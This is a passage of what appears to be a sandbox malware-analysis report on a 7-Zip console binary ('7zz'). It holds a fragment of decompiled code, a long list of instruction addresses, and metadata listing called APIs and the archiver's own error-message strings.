								 *((intOrPtr*)( *_t757 + 8))(_t757);
							}
							 *(_t1079 - 4) = 3;
							L00406E46(_t1079 - 0x7c, _t1071);
							 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
							E00405233(_t1079 - 0x2d8, __eflags);
							 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
							 *(_t1079 - 4) = 0xa;
							_t1073 = 0;
							goto L53;
						}
					} else {
						E004051E3(0x490ab8, 1);
						 *(_t1079 - 4) = 3;
						L00406E46(_t1079 - 0x7c, 0x47a420);
						 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
						E00405233(_t1079 - 0x2d8, __eflags);
						 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
						 *(_t1079 - 4) = 5;
						goto L53;
					}
				} else {
					E004051E3(0x490ab8, 1);
					 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
					 *(_t1079 - 4) = 2;
					L53:
					E0040862D();
					 *(_t1079 - 4) =  *(_t1079 - 4) | 0xffffffff;
					E00408604(_t1079 - 0x4c);
					_t554 = _t1073;
					L110:
					 *[fs:0x0] =  *((intOrPtr*)(_t1079 - 0xc));
					return _t554;
				}
			}



























































                                                                                                                                    0x00403a75
                                                                                                                                    0x00403a7a
                                                                                                                                    0x00403a80
                                                                                                                                    0x00403a83
                                                                                                                                    0x00403a8c
                                                                                                                                    0x00403a96
                                                                                                                                    0x00403a99
                                                                                                                                    0x00403a9b
                                                                                                                                    0x00403aa8
                                                                                                                                    0x00403aad
                                                                                                                                    0x00403ab3
                                                                                                                                    0x00403ab7
                                                                                                                                    0x00403abc
                                                                                                                                    0x00403ac3
                                                                                                                                    0x00403acd
                                                                                                                                    0x00403af0
                                                                                                                                    0x00403afb
                                                                                                                                    0x00403b03
                                                                                                                                    0x00403b07
                                                                                                                                    0x00403b15
                                                                                                                                    0x00403b19
                                                                                                                                    0x00403b1a
                                                                                                                                    0x00403b1e
                                                                                                                                    0x00403b23
                                                                                                                                    0x00403b2a
                                                                                                                                    0x00403b62
                                                                                                                                    0x00403b69
                                                                                                                                    0x00403b6b
                                                                                                                                    0x00403b72
                                                                                                                                    0x00403b72
                                                                                                                                    0x00403b77
                                                                                                                                    0x00403b7e
                                                                                                                                    0x00403b83
                                                                                                                                    0x00403b85
                                                                                                                                    0x00403b85
                                                                                                                                    0x00403b8a
                                                                                                                                    0x00403b91
                                                                                                                                    0x00403b97
                                                                                                                                    0x00403b99
                                                                                                                                    0x00403b99
                                                                                                                                    0x00403b9d
                                                                                                                                    0x00403b9d
                                                                                                                                    0x00403bab
                                                                                                                                    0x00403bac
                                                                                                                                    0x00403bb1
                                                                                                                                    0x00403bb3
                                                                                                                                    0x00403bb9
                                                                                                                                    0x00403bbc
                                                                                                                                    0x00403bbe
                                                                                                                                    0x00403bc2
                                                                                                                                    0x00403bcf
                                                                                                                                    0x00403bcf
                                                                                                                                    0x00403bc4
                                                                                                                                    0x00403bcb
                                                                                                                                    0x00403bcb
                                                                                                                                    0x00403bd1
                                                                                                                                    0x00403bd3
                                                                                                                                    0x00403bd6
                                                                                                                                    0x00403bda
                                                                                                                                    0x00403be0
                                                                                                                                    0x00403be5
                                                                                                                                    0x00403be5
                                                                                                                                    0x00403bea
                                                                                                                                    0x00403bee
                                                                                                                                    0x00403bf3
                                                                                                                                    0x00403bf5
                                                                                                                                    0x00403bf7
                                                                                                                                    0x00403c03
                                                                                                                                    0x00403c03
                                                                                                                                    0x00403c0e
                                                                                                                                    0x00403c13
                                                                                                                                    0x00403c16
                                                                                                                                    0x00403c19
                                                                                                                                    0x00403c1b
                                                                                                                                    0x00403c1d
                                                                                                                                    0x00403c37
                                                                                                                                    0x00403c37
                                                                                                                                    0x00403c41
                                                                                                                                    0x00403c48
                                                                                                                                    0x00403c1f
                                                                                                                                    0x00403c1f
                                                                                                                                    0x00403c26
                                                                                                                                    0x00000000
                                                                                                                                    0x00403c28
                                                                                                                                    0x00403c2e
                                                                                                                                    0x00403c33
                                                                                                                                    0x00403c35
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403c35
                                                                                                                                    0x00403c26
                                                                                                                                    0x00403c1d
                                                                                                                                    0x00403c4d
                                                                                                                                    0x00403c52
                                                                                                                                    0x00403c57
                                                                                                                                    0x00403c63
                                                                                                                                    0x00403c6a
                                                                                                                                    0x00403c6b
                                                                                                                                    0x00403c6f
                                                                                                                                    0x00403c74
                                                                                                                                    0x00403c76
                                                                                                                                    0x00403c78
                                                                                                                                    0x00403c82
                                                                                                                                    0x00403c89
                                                                                                                                    0x00403c89
                                                                                                                                    0x00403c8e
                                                                                                                                    0x00403c95
                                                                                                                                    0x00403ecc
                                                                                                                                    0x00403ed3
                                                                                                                                    0x0040400d
                                                                                                                                    0x0040400d
                                                                                                                                    0x00404011
                                                                                                                                    0x00404572
                                                                                                                                    0x00404574
                                                                                                                                    0x0040457a
                                                                                                                                    0x0040457d
                                                                                                                                    0x0040457f
                                                                                                                                    0x00404583
                                                                                                                                    0x00404590
                                                                                                                                    0x00404590
                                                                                                                                    0x00404585
                                                                                                                                    0x0040458c
                                                                                                                                    0x0040458c
                                                                                                                                    0x00404592
                                                                                                                                    0x00404594
                                                                                                                                    0x00404598
                                                                                                                                    0x0040459b
                                                                                                                                    0x004045a0
                                                                                                                                    0x004045a0
                                                                                                                                    0x004045a3
                                                                                                                                    0x004045ac
                                                                                                                                    0x004045b6
                                                                                                                                    0x004045b9
                                                                                                                                    0x004045bd
                                                                                                                                    0x004045ca
                                                                                                                                    0x004045cd
                                                                                                                                    0x004045d0
                                                                                                                                    0x004045d3
                                                                                                                                    0x004045d6
                                                                                                                                    0x004045d9
                                                                                                                                    0x004045dc
                                                                                                                                    0x004045df
                                                                                                                                    0x004045e2
                                                                                                                                    0x004045f3
                                                                                                                                    0x00404600
                                                                                                                                    0x00404604
                                                                                                                                    0x0040460a
                                                                                                                                    0x00404615
                                                                                                                                    0x0040461a
                                                                                                                                    0x00404626
                                                                                                                                    0x0040462a
                                                                                                                                    0x00404630
                                                                                                                                    0x00404636
                                                                                                                                    0x0040463b
                                                                                                                                    0x00404642
                                                                                                                                    0x00404651
                                                                                                                                    0x0040465d
                                                                                                                                    0x0040466a
                                                                                                                                    0x0040467b
                                                                                                                                    0x00404687
                                                                                                                                    0x0040468d
                                                                                                                                    0x0040469e
                                                                                                                                    0x0040469f
                                                                                                                                    0x004046a7
                                                                                                                                    0x004046ac
                                                                                                                                    0x004046af
                                                                                                                                    0x004046b2
                                                                                                                                    0x004046c3
                                                                                                                                    0x004046c9
                                                                                                                                    0x004046d0
                                                                                                                                    0x004046d1
                                                                                                                                    0x004046db
                                                                                                                                    0x004046dc
                                                                                                                                    0x004046e3
                                                                                                                                    0x004046e7
                                                                                                                                    0x004046f1
                                                                                                                                    0x004046f5
                                                                                                                                    0x004046fa
                                                                                                                                    0x004046fe
                                                                                                                                    0x00404706
                                                                                                                                    0x00404708
                                                                                                                                    0x00404721
                                                                                                                                    0x00404726
                                                                                                                                    0x0040472a
                                                                                                                                    0x0040472c
                                                                                                                                    0x0040472c
                                                                                                                                    0x0040472a
                                                                                                                                    0x00404736
                                                                                                                                    0x0040473b
                                                                                                                                    0x0040473e
                                                                                                                                    0x00404741
                                                                                                                                    0x00404743
                                                                                                                                    0x0040474a
                                                                                                                                    0x00404762
                                                                                                                                    0x00404745
                                                                                                                                    0x00404745
                                                                                                                                    0x00404748
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404748
                                                                                                                                    0x0040476a
                                                                                                                                    0x0040476d
                                                                                                                                    0x004048d7
                                                                                                                                    0x004048d7
                                                                                                                                    0x004048db
                                                                                                                                    0x004048e3
                                                                                                                                    0x004048e6
                                                                                                                                    0x004048eb
                                                                                                                                    0x004048ee
                                                                                                                                    0x004048f3
                                                                                                                                    0x004048f5
                                                                                                                                    0x0040490f
                                                                                                                                    0x0040490f
                                                                                                                                    0x00404914
                                                                                                                                    0x00404917
                                                                                                                                    0x0040491c
                                                                                                                                    0x0040491e
                                                                                                                                    0x00404938
                                                                                                                                    0x00404938
                                                                                                                                    0x004048dd
                                                                                                                                    0x004048dd
                                                                                                                                    0x004048e1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004048e1
                                                                                                                                    0x0040493d
                                                                                                                                    0x00404941
                                                                                                                                    0x0040494b
                                                                                                                                    0x00404952
                                                                                                                                    0x00404952
                                                                                                                                    0x0040495a
                                                                                                                                    0x00404960
                                                                                                                                    0x0040496a
                                                                                                                                    0x00404975
                                                                                                                                    0x0040497a
                                                                                                                                    0x0040497d
                                                                                                                                    0x00404981
                                                                                                                                    0x00404986
                                                                                                                                    0x00404986
                                                                                                                                    0x0040498c
                                                                                                                                    0x00404990
                                                                                                                                    0x00404995
                                                                                                                                    0x00404998
                                                                                                                                    0x0040499c
                                                                                                                                    0x0040499e
                                                                                                                                    0x004049a3
                                                                                                                                    0x004049a3
                                                                                                                                    0x004049a9
                                                                                                                                    0x004049ad
                                                                                                                                    0x004049b2
                                                                                                                                    0x004049bc
                                                                                                                                    0x004049c1
                                                                                                                                    0x004049c8
                                                                                                                                    0x00000000
                                                                                                                                    0x00404773
                                                                                                                                    0x00404776
                                                                                                                                    0x00404779
                                                                                                                                    0x00000000
                                                                                                                                    0x0040477f
                                                                                                                                    0x0040477f
                                                                                                                                    0x00404783
                                                                                                                                    0x0040478d
                                                                                                                                    0x00404794
                                                                                                                                    0x00404794
                                                                                                                                    0x00404799
                                                                                                                                    0x004047a1
                                                                                                                                    0x004047a7
                                                                                                                                    0x004047c6
                                                                                                                                    0x004047cb
                                                                                                                                    0x004047cb
                                                                                                                                    0x004047d1
                                                                                                                                    0x004047d8
                                                                                                                                    0x004047eb
                                                                                                                                    0x00404806
                                                                                                                                    0x0040480d
                                                                                                                                    0x004047da
                                                                                                                                    0x004047da
                                                                                                                                    0x004047e1
                                                                                                                                    0x00000000
                                                                                                                                    0x004047e3
                                                                                                                                    0x004047e3
                                                                                                                                    0x004047e9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004047e9
                                                                                                                                    0x004047e1
                                                                                                                                    0x0040483f
                                                                                                                                    0x00404854
                                                                                                                                    0x0040485b
                                                                                                                                    0x00404860
                                                                                                                                    0x00404867
                                                                                                                                    0x00404875
                                                                                                                                    0x00404897
                                                                                                                                    0x00404897
                                                                                                                                    0x0040489f
                                                                                                                                    0x004048a5
                                                                                                                                    0x004048af
                                                                                                                                    0x004048ba
                                                                                                                                    0x004048bf
                                                                                                                                    0x004048c2
                                                                                                                                    0x004048c6
                                                                                                                                    0x004048cf
                                                                                                                                    0x004048cf
                                                                                                                                    0x00000000
                                                                                                                                    0x004048c6
                                                                                                                                    0x00404779
                                                                                                                                    0x00000000
                                                                                                                                    0x00404017
                                                                                                                                    0x00404017
                                                                                                                                    0x0040401e
                                                                                                                                    0x004049dd
                                                                                                                                    0x004049e4
                                                                                                                                    0x004049eb
                                                                                                                                    0x004049ec
                                                                                                                                    0x004049ef
                                                                                                                                    0x004049f5
                                                                                                                                    0x004049fd
                                                                                                                                    0x00404a06
                                                                                                                                    0x00404a08
                                                                                                                                    0x00404a0f
                                                                                                                                    0x00404a16
                                                                                                                                    0x00404a17
                                                                                                                                    0x00404a1d
                                                                                                                                    0x00404a22
                                                                                                                                    0x00404a25
                                                                                                                                    0x00404a30
                                                                                                                                    0x00404a53
                                                                                                                                    0x00404a5b
                                                                                                                                    0x00404a5f
                                                                                                                                    0x00404a64
                                                                                                                                    0x00404a66
                                                                                                                                    0x00404a6a
                                                                                                                                    0x00404a6f
                                                                                                                                    0x00404a6f
                                                                                                                                    0x00404a75
                                                                                                                                    0x00404a79
                                                                                                                                    0x00404a7e
                                                                                                                                    0x00404a7e
                                                                                                                                    0x00404a7e
                                                                                                                                    0x00404a88
                                                                                                                                    0x00404a8d
                                                                                                                                    0x00404a94
                                                                                                                                    0x00000000
                                                                                                                                    0x00404a27
                                                                                                                                    0x00404a27
                                                                                                                                    0x00404a2a
                                                                                                                                    0x00404ab7
                                                                                                                                    0x00404ab9
                                                                                                                                    0x00000000
                                                                                                                                    0x00404abf
                                                                                                                                    0x00404abf
                                                                                                                                    0x00404acb
                                                                                                                                    0x00404ad0
                                                                                                                                    0x00404ad2
                                                                                                                                    0x00404ad4
                                                                                                                                    0x00404ad7
                                                                                                                                    0x00404ada
                                                                                                                                    0x00404ae1
                                                                                                                                    0x00404ae4
                                                                                                                                    0x00404aea
                                                                                                                                    0x00404aea
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404a2a
                                                                                                                                    0x00404024
                                                                                                                                    0x0040402a
                                                                                                                                    0x0040402f
                                                                                                                                    0x00404031
                                                                                                                                    0x00404502
                                                                                                                                    0x00000000
                                                                                                                                    0x00404037
                                                                                                                                    0x00404037
                                                                                                                                    0x0040403e
                                                                                                                                    0x00404040
                                                                                                                                    0x00404046
                                                                                                                                    0x00404054
                                                                                                                                    0x00404054
                                                                                                                                    0x00404046
                                                                                                                                    0x0040405f
                                                                                                                                    0x00404064
                                                                                                                                    0x0040406b
                                                                                                                                    0x0040406f
                                                                                                                                    0x00404075
                                                                                                                                    0x00404085
                                                                                                                                    0x00404085
                                                                                                                                    0x00404085
                                                                                                                                    0x00404085
                                                                                                                                    0x00404077
                                                                                                                                    0x00404077
                                                                                                                                    0x0040407d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040407f
                                                                                                                                    0x0040407f
                                                                                                                                    0x0040407f
                                                                                                                                    0x0040407d
                                                                                                                                    0x00404092
                                                                                                                                    0x0040409f
                                                                                                                                    0x004040aa
                                                                                                                                    0x004040b5
                                                                                                                                    0x004040bc
                                                                                                                                    0x004040c5
                                                                                                                                    0x004040c9
                                                                                                                                    0x004040cf
                                                                                                                                    0x004040e2
                                                                                                                                    0x004040e2
                                                                                                                                    0x004040e2
                                                                                                                                    0x004040e2
                                                                                                                                    0x004040d1
                                                                                                                                    0x004040d1
                                                                                                                                    0x004040d7
                                                                                                                                    0x00000000
                                                                                                                                    0x004040d9
                                                                                                                                    0x004040d9
                                                                                                                                    0x004040d9
                                                                                                                                    0x004040d7
                                                                                                                                    0x004040f6
                                                                                                                                    0x00404108
                                                                                                                                    0x0040410e
                                                                                                                                    0x00404119
                                                                                                                                    0x0040412a
                                                                                                                                    0x0040412e
                                                                                                                                    0x0040412f
                                                                                                                                    0x00404130
                                                                                                                                    0x00404134
                                                                                                                                    0x00404139
                                                                                                                                    0x0040413b
                                                                                                                                    0x0040413d
                                                                                                                                    0x00404147
                                                                                                                                    0x0040414e
                                                                                                                                    0x0040414e
                                                                                                                                    0x00404159
                                                                                                                                    0x0040415f
                                                                                                                                    0x00404166
                                                                                                                                    0x0040416d
                                                                                                                                    0x00404174
                                                                                                                                    0x00404177
                                                                                                                                    0x0040417c
                                                                                                                                    0x00404180
                                                                                                                                    0x00404187
                                                                                                                                    0x0040418a
                                                                                                                                    0x0040418f
                                                                                                                                    0x00404198
                                                                                                                                    0x004041b4
                                                                                                                                    0x004041b9
                                                                                                                                    0x004041bf
                                                                                                                                    0x004041c1
                                                                                                                                    0x004041c3
                                                                                                                                    0x004041c6
                                                                                                                                    0x004041c8
                                                                                                                                    0x004041ce
                                                                                                                                    0x004041e2
                                                                                                                                    0x004041f0
                                                                                                                                    0x004041f3
                                                                                                                                    0x004041fa
                                                                                                                                    0x004041fe
                                                                                                                                    0x00404209
                                                                                                                                    0x0040420e
                                                                                                                                    0x00404215
                                                                                                                                    0x0040421a
                                                                                                                                    0x0040421c
                                                                                                                                    0x0040421c
                                                                                                                                    0x004041c8
                                                                                                                                    0x00404230
                                                                                                                                    0x00404252
                                                                                                                                    0x00404259
                                                                                                                                    0x0040425a
                                                                                                                                    0x0040425d
                                                                                                                                    0x00404266
                                                                                                                                    0x00404266
                                                                                                                                    0x0040426e
                                                                                                                                    0x00404273
                                                                                                                                    0x00404276
                                                                                                                                    0x00404276
                                                                                                                                    0x00404279
                                                                                                                                    0x0040427d
                                                                                                                                    0x00404283
                                                                                                                                    0x0040428a
                                                                                                                                    0x0040428d
                                                                                                                                    0x00404290
                                                                                                                                    0x00404293
                                                                                                                                    0x00404298
                                                                                                                                    0x0040429e
                                                                                                                                    0x004042a2
                                                                                                                                    0x004042a7
                                                                                                                                    0x004042b3
                                                                                                                                    0x004042bc
                                                                                                                                    0x004042bc
                                                                                                                                    0x004042c1
                                                                                                                                    0x004042c7
                                                                                                                                    0x004042d3
                                                                                                                                    0x004042dc
                                                                                                                                    0x004042dc
                                                                                                                                    0x004042e1
                                                                                                                                    0x004042e7
                                                                                                                                    0x004042f3
                                                                                                                                    0x004042fc
                                                                                                                                    0x004042fc
                                                                                                                                    0x00404301
                                                                                                                                    0x00404307
                                                                                                                                    0x00404309
                                                                                                                                    0x0040430e
                                                                                                                                    0x00404317
                                                                                                                                    0x0040431b
                                                                                                                                    0x00404320
                                                                                                                                    0x00404327
                                                                                                                                    0x00404331
                                                                                                                                    0x00404331
                                                                                                                                    0x00404336
                                                                                                                                    0x00404339
                                                                                                                                    0x0040433b
                                                                                                                                    0x00404340
                                                                                                                                    0x0040434c
                                                                                                                                    0x0040434c
                                                                                                                                    0x00404360
                                                                                                                                    0x00404360
                                                                                                                                    0x00404365
                                                                                                                                    0x0040436b
                                                                                                                                    0x0040436d
                                                                                                                                    0x00404370
                                                                                                                                    0x0040439b
                                                                                                                                    0x004043b7
                                                                                                                                    0x004043bc
                                                                                                                                    0x004043be
                                                                                                                                    0x004043c1
                                                                                                                                    0x004043c3
                                                                                                                                    0x004043c9
                                                                                                                                    0x004043dd
                                                                                                                                    0x004043ee
                                                                                                                                    0x004043f1
                                                                                                                                    0x004043f8
                                                                                                                                    0x004043fc
                                                                                                                                    0x00404407
                                                                                                                                    0x0040440c
                                                                                                                                    0x00404416
                                                                                                                                    0x0040441b
                                                                                                                                    0x0040441d
                                                                                                                                    0x0040441d
                                                                                                                                    0x004043c3
                                                                                                                                    0x00404431
                                                                                                                                    0x00404453
                                                                                                                                    0x0040445a
                                                                                                                                    0x0040445b
                                                                                                                                    0x0040445e
                                                                                                                                    0x00404467
                                                                                                                                    0x00404467
                                                                                                                                    0x0040446f
                                                                                                                                    0x00404474
                                                                                                                                    0x00404477
                                                                                                                                    0x00404372
                                                                                                                                    0x00404372
                                                                                                                                    0x00404378
                                                                                                                                    0x0040438e
                                                                                                                                    0x0040438e
                                                                                                                                    0x00404378
                                                                                                                                    0x00404480
                                                                                                                                    0x00404484
                                                                                                                                    0x0040448f
                                                                                                                                    0x00404493
                                                                                                                                    0x0040449e
                                                                                                                                    0x004044a4
                                                                                                                                    0x004044ab
                                                                                                                                    0x004044b0
                                                                                                                                    0x004044b2
                                                                                                                                    0x004044b6
                                                                                                                                    0x004044bb
                                                                                                                                    0x004044bb
                                                                                                                                    0x004044c1
                                                                                                                                    0x004044c5
                                                                                                                                    0x004044ca
                                                                                                                                    0x004044d4
                                                                                                                                    0x004044d9
                                                                                                                                    0x004044e3
                                                                                                                                    0x004044ea
                                                                                                                                    0x004044ef
                                                                                                                                    0x004044f6
                                                                                                                                    0x004044fb
                                                                                                                                    0x004044fb
                                                                                                                                    0x00000000
                                                                                                                                    0x00404031
                                                                                                                                    0x0040401e
                                                                                                                                    0x00403ed9
                                                                                                                                    0x00403ee4
                                                                                                                                    0x00403ee9
                                                                                                                                    0x00403ee9
                                                                                                                                    0x00403eec
                                                                                                                                    0x00403ef2
                                                                                                                                    0x00403ef8
                                                                                                                                    0x00403efa
                                                                                                                                    0x00403f00
                                                                                                                                    0x00403f96
                                                                                                                                    0x00403f96
                                                                                                                                    0x00403f9b
                                                                                                                                    0x00403f9d
                                                                                                                                    0x00000000
                                                                                                                                    0x00403fa3
                                                                                                                                    0x00403fa3
                                                                                                                                    0x00403fa6
                                                                                                                                    0x00403ffc
                                                                                                                                    0x00404008
                                                                                                                                    0x00000000
                                                                                                                                    0x00403fa8
                                                                                                                                    0x00403faf
                                                                                                                                    0x00403fb7
                                                                                                                                    0x00403fbb
                                                                                                                                    0x00403fc0
                                                                                                                                    0x00403fc2
                                                                                                                                    0x00403fc6
                                                                                                                                    0x00403fcb
                                                                                                                                    0x00403fcb
                                                                                                                                    0x00403fd1
                                                                                                                                    0x00403fd5
                                                                                                                                    0x00403fda
                                                                                                                                    0x00403fe4
                                                                                                                                    0x00403fe9
                                                                                                                                    0x00403ff0
                                                                                                                                    0x00404a9b
                                                                                                                                    0x00404a9e
                                                                                                                                    0x00404aa3
                                                                                                                                    0x00404aaa
                                                                                                                                    0x00404ab1
                                                                                                                                    0x00000000
                                                                                                                                    0x00404ab1
                                                                                                                                    0x00403fa6
                                                                                                                                    0x00403f06
                                                                                                                                    0x00403f06
                                                                                                                                    0x00403f0b
                                                                                                                                    0x00403f0d
                                                                                                                                    0x00404507
                                                                                                                                    0x0040450a
                                                                                                                                    0x0040450e
                                                                                                                                    0x00404513
                                                                                                                                    0x00404516
                                                                                                                                    0x0040451a
                                                                                                                                    0x0040451c
                                                                                                                                    0x00404521
                                                                                                                                    0x00404521
                                                                                                                                    0x00404527
                                                                                                                                    0x0040452b
                                                                                                                                    0x00404530
                                                                                                                                    0x0040453a
                                                                                                                                    0x0040453f
                                                                                                                                    0x00404549
                                                                                                                                    0x00404550
                                                                                                                                    0x00404555
                                                                                                                                    0x0040455c
                                                                                                                                    0x00404561
                                                                                                                                    0x00404561
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f13
                                                                                                                                    0x00403f13
                                                                                                                                    0x00403f16
                                                                                                                                    0x00403f85
                                                                                                                                    0x00403f91
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f18
                                                                                                                                    0x00403f1f
                                                                                                                                    0x00403f27
                                                                                                                                    0x00403f2b
                                                                                                                                    0x00403f30
                                                                                                                                    0x00403f32
                                                                                                                                    0x00403f36
                                                                                                                                    0x00403f3b
                                                                                                                                    0x00403f3b
                                                                                                                                    0x00403f41
                                                                                                                                    0x00403f45
                                                                                                                                    0x00403f4a
                                                                                                                                    0x00403f4a
                                                                                                                                    0x00403f4a
                                                                                                                                    0x00403f54
                                                                                                                                    0x00403f59
                                                                                                                                    0x00403f62
                                                                                                                                    0x00403f69
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f69
                                                                                                                                    0x00403f16
                                                                                                                                    0x00403f0d
                                                                                                                                    0x00403f00
                                                                                                                                    0x00403c9b
                                                                                                                                    0x00403cb7
                                                                                                                                    0x00403cbc
                                                                                                                                    0x00403cbf
                                                                                                                                    0x00403cc3
                                                                                                                                    0x00403cc5
                                                                                                                                    0x00403ccb
                                                                                                                                    0x00403cd9
                                                                                                                                    0x00403cde
                                                                                                                                    0x00403ce7
                                                                                                                                    0x00403cec
                                                                                                                                    0x00403cfc
                                                                                                                                    0x00403d01
                                                                                                                                    0x00403d12
                                                                                                                                    0x00403d1e
                                                                                                                                    0x00403d23
                                                                                                                                    0x00403d2a
                                                                                                                                    0x00403d36
                                                                                                                                    0x00403d42
                                                                                                                                    0x00403d45
                                                                                                                                    0x00403d48
                                                                                                                                    0x00403d4b
                                                                                                                                    0x00403d50
                                                                                                                                    0x00403d54
                                                                                                                                    0x00403d58
                                                                                                                                    0x00403d5c
                                                                                                                                    0x00403d5e
                                                                                                                                    0x00403d6b
                                                                                                                                    0x00403d6e
                                                                                                                                    0x00403d76
                                                                                                                                    0x00403d7a
                                                                                                                                    0x00403d84
                                                                                                                                    0x00403d8f
                                                                                                                                    0x00403d93
                                                                                                                                    0x00403d9d
                                                                                                                                    0x00403d9d
                                                                                                                                    0x00403da7
                                                                                                                                    0x00403dac
                                                                                                                                    0x00403db2
                                                                                                                                    0x00403db2
                                                                                                                                    0x00403d5e
                                                                                                                                    0x00403dbe
                                                                                                                                    0x00403dca
                                                                                                                                    0x00403dcf
                                                                                                                                    0x00403dd3
                                                                                                                                    0x00403dd7
                                                                                                                                    0x00403dd9
                                                                                                                                    0x00403ddf
                                                                                                                                    0x00403de2
                                                                                                                                    0x00403de4
                                                                                                                                    0x00403de7
                                                                                                                                    0x00403df2
                                                                                                                                    0x00403df2
                                                                                                                                    0x00403df5
                                                                                                                                    0x00403df7
                                                                                                                                    0x00403dfa
                                                                                                                                    0x00403e01
                                                                                                                                    0x00403e01
                                                                                                                                    0x00403dfc
                                                                                                                                    0x00403dfc
                                                                                                                                    0x00403dfc
                                                                                                                                    0x00403e07
                                                                                                                                    0x00403e0f
                                                                                                                                    0x00403e11
                                                                                                                                    0x00403e13
                                                                                                                                    0x00403e16
                                                                                                                                    0x00403e1d
                                                                                                                                    0x00403e1d
                                                                                                                                    0x00403e18
                                                                                                                                    0x00403e18
                                                                                                                                    0x00403e18
                                                                                                                                    0x00403e20
                                                                                                                                    0x00403de9
                                                                                                                                    0x00403de9
                                                                                                                                    0x00403deb
                                                                                                                                    0x00000000
                                                                                                                                    0x00403ded
                                                                                                                                    0x00403ded
                                                                                                                                    0x00403ded
                                                                                                                                    0x00403deb
                                                                                                                                    0x00403e23
                                                                                                                                    0x00403e2c
                                                                                                                                    0x00403e31
                                                                                                                                    0x00403e37
                                                                                                                                    0x00403e37
                                                                                                                                    0x00403dd9
                                                                                                                                    0x00403e3f
                                                                                                                                    0x00403e44
                                                                                                                                    0x00403e4b
                                                                                                                                    0x00403e50
                                                                                                                                    0x00403e53
                                                                                                                                    0x00403e5a
                                                                                                                                    0x00403e5a
                                                                                                                                    0x00403ccb
                                                                                                                                    0x00403e7a
                                                                                                                                    0x00403e82
                                                                                                                                    0x00403e86
                                                                                                                                    0x00403e8b
                                                                                                                                    0x00403e8e
                                                                                                                                    0x00403e92
                                                                                                                                    0x00403e94
                                                                                                                                    0x00403e99
                                                                                                                                    0x00403e99
                                                                                                                                    0x00403e9f
                                                                                                                                    0x00403ea3
                                                                                                                                    0x00403ea8
                                                                                                                                    0x00403eb2
                                                                                                                                    0x00403eb7
                                                                                                                                    0x00403ebe
                                                                                                                                    0x00403ec5
                                                                                                                                    0x00000000
                                                                                                                                    0x00403ec5
                                                                                                                                    0x00403b2c
                                                                                                                                    0x00403b33
                                                                                                                                    0x00403b3b
                                                                                                                                    0x00403b3f
                                                                                                                                    0x00403b44
                                                                                                                                    0x00403b4e
                                                                                                                                    0x00403b53
                                                                                                                                    0x00403b56
                                                                                                                                    0x00000000
                                                                                                                                    0x00403b56
                                                                                                                                    0x00403acf
                                                                                                                                    0x00403ad6
                                                                                                                                    0x00403adb
                                                                                                                                    0x00403ade
                                                                                                                                    0x00403f6a
                                                                                                                                    0x00403f6d
                                                                                                                                    0x00403f72
                                                                                                                                    0x00403f79
                                                                                                                                    0x00403f7e
                                                                                                                                    0x00404563
                                                                                                                                    0x00404569
                                                                                                                                    0x00404571
                                                                                                                                    0x00404571

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00403A75
                                                                                                                                    • SetFileApisToOEM.KERNEL32 ref: 00403A83
                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00403A9E
                                                                                                                                      • Part of subcall function 00406C53: __EH_prolog.LIBCMT ref: 00406C58
                                                                                                                                      • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                                                                      • Part of subcall function 00407CEC: __EH_prolog.LIBCMT ref: 00407CF1
                                                                                                                                      • Part of subcall function 00404B09: __EH_prolog.LIBCMT ref: 00404B0E
                                                                                                                                      • Part of subcall function 00405233: __EH_prolog.LIBCMT ref: 00405238
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$ApisCommandExceptionFileLineRaise
                                                                                                                                    • String ID: CRC Error$Decoding Error$Error:$ : $ file$----------------$59@$Archive Errors: $Archives: $CRC$CRC: $Codecs:$Compressed: $Error: $Errors: $Files: $Folders: $Formats:$Size: $Sub items Errors: $WARNING: Cannot find $WARNING: Cannot open $WARNINGS for files:
                                                                                                                                    • API String ID: 3088770371-3134536549
                                                                                                                                    • Opcode ID: fc0d083252d6559792fd6895704e8a46f1cd35184889d66b2ac42ab283637d64
                                                                                                                                    • Instruction ID: 0e9785898952d904cddb7e6f0fb348193d980c7c6074724112ac217821b8bdc4
